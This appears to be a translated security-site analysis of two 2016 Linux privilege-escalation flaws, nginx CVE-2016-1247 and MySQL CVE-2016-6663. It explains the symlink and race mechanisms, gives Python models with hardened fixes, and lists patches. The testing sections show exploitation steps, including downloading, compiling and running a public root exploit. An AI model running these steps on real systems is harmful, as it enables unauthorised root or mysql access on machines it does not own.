myhack58 / Anonymous (佚名) / MYHACK58:62201681612
History: Nov 29, 2016 - 12:00 a.m.

Linux application permission misconfigurations that allow privilege escalation: a series of vulnerability analyses - Vulnerability Warning - Hei Ba Security Net (myhack58)

Anonymous (佚名)
www.myhack58.com

EPSS: 0.001 (percentile 39.9%)

Foreword

Linux has a powerful file permission system, and in everyday use it is very convenient, but when permissions are handled improperly it creates real security risks. For example, if a privileged program operates on files and changes the permissions of certain directories or files by path, and that path can be redirected through a symbolic link, the operation can be pointed at a system file, overwriting it or changing its permissions. An attacker uses this principle to hijack a shared library (.so) or to modify a scheduled script, and thereby escalates privileges.

Case

Nginx CVE-2016-1247

Affected versions

Debian-based distributions (Debian*)

The vulnerability principle

On Debian-based distributions, the nginx package installed by apt-get sets the owner of the log directory to www-data by default:

    yaseng@ubuntu:/tmp$ ls -ld /var/log/nginx/
    drwxr-x--- 2 www-data adm 4096 Nov 21 17:42 /var/log/nginx/

An attacker running as www-data can therefore replace a log file in that directory with a symbolic link pointing at a file it has no permission to write, for example /etc/ld.so.preload (the dynamic loader's preload list). When nginx restarts or reopens its logs, the root-owned master process sets the ownership of the log path to www-data, and because chown follows the symlink, /etc/ld.so.preload itself becomes writable by www-data. Writing the path of a malicious shared object into that file hijacks every dynamically linked program started afterwards, including root-owned ones, and so gives root.

The Debian package also ships a logrotate script (/etc/logrotate.d/nginx) that the daily cron job runs at 06:25; it rotates the logs and re-applies the log permissions. It is therefore enough to write a script that watches for /etc/ld.so.preload to become writable and then writes the path of a privilege-escalating .so into it.
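The mechanism above reduces to a privileged process changing a file's permissions by path while an unprivileged user controls the directory. The following Python script is an added example, not code from the original article or from nginx: it models the root-side log reopen with a chmod (changing ownership to another user needs root, changing the mode of a file you own does not, and both follow symlinks the same way), shows a hardened variant that opens the log with O_NOFOLLOW and acts on the descriptor, and includes the check an administrator would run, listing log files that are symlinks. The directory layout is constructed under a temporary directory; "ld.so.preload" and "nginx/error.log" there are stand-ins for /etc/ld.so.preload and /var/log/nginx/error.log.

```python
import errno
import os
import stat
import tempfile


def privileged_reopen_vulnerable(log_path, mode):
    """Models the weak behaviour: a root process re-applies a log file's
    permissions by path. chmod()/chown() by path follow symbolic links, so
    whoever controls the directory decides which file is really changed."""
    os.chmod(log_path, mode)


def privileged_reopen_hardened(log_path, mode):
    """Open with O_NOFOLLOW (fails with ELOOP if the path is a symlink),
    verify the inode is a regular file, then apply the mode to the
    descriptor rather than to the path."""
    fd = os.open(log_path, os.O_WRONLY | os.O_NOFOLLOW)
    try:
        if not stat.S_ISREG(os.fstat(fd).st_mode):
            raise OSError(errno.EINVAL, "log path is not a regular file", log_path)
        os.fchmod(fd, mode)
    finally:
        os.close(fd)


def symlinked_logs(log_dir):
    """Administrator's check: entries in the log directory that are symlinks.
    None should be (the shell equivalent is `find /var/log/nginx -type l`)."""
    return sorted(n for n in os.listdir(log_dir)
                  if os.path.islink(os.path.join(log_dir, n)))


def demo():
    """Constructed scenario: the unprivileged log-directory owner has pointed
    error.log at a sensitive file it cannot write (stand-in for /etc/ld.so.preload)."""
    with tempfile.TemporaryDirectory() as tmp:
        target = os.path.join(tmp, "ld.so.preload")
        with open(target, "w"):
            pass
        os.chmod(target, 0o644)
        log_dir = os.path.join(tmp, "nginx")
        os.mkdir(log_dir)
        link = os.path.join(log_dir, "error.log")
        os.symlink(target, link)          # the attacker's move as www-data

        privileged_reopen_vulnerable(link, 0o666)
        vuln_mode = stat.S_IMODE(os.stat(target).st_mode)

        os.chmod(target, 0o644)           # reset, then retry with the safe variant
        try:
            privileged_reopen_hardened(link, 0o666)
            blocked = False
        except OSError as e:
            blocked = e.errno == errno.ELOOP
        hard_mode = stat.S_IMODE(os.stat(target).st_mode)

        return {
            "vulnerable_target_mode": vuln_mode,   # 0o666: the target is now world-writable
            "hardened_blocked": blocked,           # True: open() refused the symlink
            "hardened_target_mode": hard_mode,     # 0o644: untouched
            "flagged": symlinked_logs(log_dir),    # ['error.log']
        }


if __name__ == "__main__":
    print(demo())
```

The same rule applies to the ownership change nginx performs: open the path with O_NOFOLLOW and use fchown on the descriptor, or simply never leave a directory that a privileged process writes into owned by an unprivileged account.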

Vulnerability testing

Environment: Ubuntu 15.04

Exploit: <http://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html>

Install: sudo apt-get install nginx

Privilege escalation

    www-data@ubuntu:/tmp$ pwd
    /tmp
    www-data@ubuntu:/tmp$ id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    www-data@ubuntu:/tmp$ file 4.sh
    4.sh: Bourne-Again shell script, ASCII text executable
    www-data@ubuntu:/tmp$ ./4.sh /var/log/nginx/error.log

Wait for nginx to restart (or for the logs to be rotated), and you obtain root.

[Screenshot: nginx_1]

Bug fixes

Change the ownership of the log directory to root, so that the www-data user can no longer replace the log files with symbolic links.

MySQL CVE-2016-6663

Affected versions

MariaDB

< 5.5.52

< 10.1.18

< 10.0.28

MySQL

<= 5.5.51

<= 5.6.32

<= 5.7.14

Percona Server

< 5.5.51-38.2

< 5.6.32-78.1

< 5.7.14-8

Percona XtraDB Cluster

< 5.6.32-25.17

< 5.7.14-26.17

< 5.5.41-37.0

The vulnerability principle

When MySQL and its derivatives execute REPAIR TABLE xxx, mysqld creates a temporary file xxx.TMD and then sets its permissions by path, copying the mode of the table's data file; if that mode carries the setuid bit, the new file ends up setuid for the mysql user. Because the attacker controls the data directory in which this happens, there is a race window between the creation of xxx.TMD and the permission change: if the attacker swaps in another file (for example a copy of /bin/bash) before the permissions are applied, that file becomes a mysql-setuid interactive shell. This escalates from the web server user to the mysql user.
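To show the race at the file-system level, here is an added Python model that is not from the article, the exploit, or the MySQL code base. mysqld's sequence is reduced to "stat the .MYD, create the .TMD, chmod the .TMD by path", and the attacker winning the race is represented by a callback that swaps the .TMD for a symlink to a stand-in for the copied shell inside the attacker-controlled data directory. The hardened variant creates the temporary file with O_CREAT|O_EXCL|O_NOFOLLOW, applies the mode with fchmod on the descriptor it already holds, and refuses to copy set-id bits at all. All file names are hypothetical, and the whole scenario runs in a temporary directory as the current user.

```python
import os
import stat
import tempfile

SETID_BITS = stat.S_ISUID | stat.S_ISGID


def repair_vulnerable(datadir, table, attacker_wins_race):
    """Models the vulnerable sequence: read the mode of <table>.MYD, create
    <table>.TMD, then chmod the .TMD by path. Everything between creating the
    temp file and the chmod is the race window."""
    myd = os.path.join(datadir, table + ".MYD")
    tmd = os.path.join(datadir, table + ".TMD")
    mode = stat.S_IMODE(os.stat(myd).st_mode)      # attacker chose this mode
    fd = os.open(tmd, os.O_WRONLY | os.O_CREAT, 0o660)
    os.close(fd)
    attacker_wins_race(tmd)                        # .TMD is swapped out here
    os.chmod(tmd, mode)                            # follows the swapped-in symlink


def repair_hardened(datadir, table, attacker_wins_race):
    """Create the temp file exclusively, keep the descriptor, and apply the
    mode with fchmod so a later path swap cannot redirect it. Set-id bits are
    never copied from a file the client may control."""
    myd = os.path.join(datadir, table + ".MYD")
    tmd = os.path.join(datadir, table + ".TMD")
    mode = stat.S_IMODE(os.stat(myd).st_mode) & ~SETID_BITS
    fd = os.open(tmd, os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW, 0o660)
    try:
        attacker_wins_race(tmd)                    # same swap, but we hold the inode
        os.fchmod(fd, mode)
    finally:
        os.close(fd)


def simulate(repair):
    """Constructed scenario in an attacker-controlled data directory. Returns
    the final mode of the attacker's shell copy: 0o4755 means it became setuid."""
    with tempfile.TemporaryDirectory() as datadir:
        shell = os.path.join(datadir, "mysql_suid_shell")   # stand-in for the bash copy
        with open(shell, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(shell, 0o755)

        myd = os.path.join(datadir, "t.MYD")
        with open(myd, "w"):
            pass
        os.chmod(myd, 0o4755)        # attacker made the "table" file setuid

        def swap(tmd):
            # The attacker wins the race: replace the fresh .TMD with a symlink.
            os.unlink(tmd)
            os.symlink(shell, tmd)

        repair(datadir, "t", swap)
        return stat.S_IMODE(os.stat(shell).st_mode)


if __name__ == "__main__":
    print(oct(simulate(repair_vulnerable)))   # 0o4755: shell is now setuid
    print(oct(simulate(repair_hardened)))     # 0o755: unchanged
```

In the hardened path the swap still happens, but fchmod acts on the inode the server created, which the attacker has merely unlinked; the shell copy is never touched, and even an honest .TMD would not inherit the setuid bit.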

Vulnerability testing

Environment: Ubuntu 15.04, MySQL 5.6.28

Exploit: <http://legalhackers.com/exploits/CVE-2016-6663/mysql-privesc-race.c>

Steps

    yaseng@ubuntu:/tmp$ sudo apt-get install mysql-server mysql-client
    yaseng@ubuntu:/tmp$ sudo service mysqld restart
    yaseng@ubuntu:/tmp$ wget http://legalhackers.com/exploits/CVE-2016-6663/mysql-privesc-race.c
    yaseng@ubuntu:/tmp$ gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient
    yaseng@ubuntu:/tmp$ ./mysql-privesc-race test test localhost test

Screenshot

[Screenshot: mysql_1]

Bug fixes

<https://github.com/mysql/mysql-server/commit/4e5473862e6852b0f3802b0cd0c6fa10b5253291>
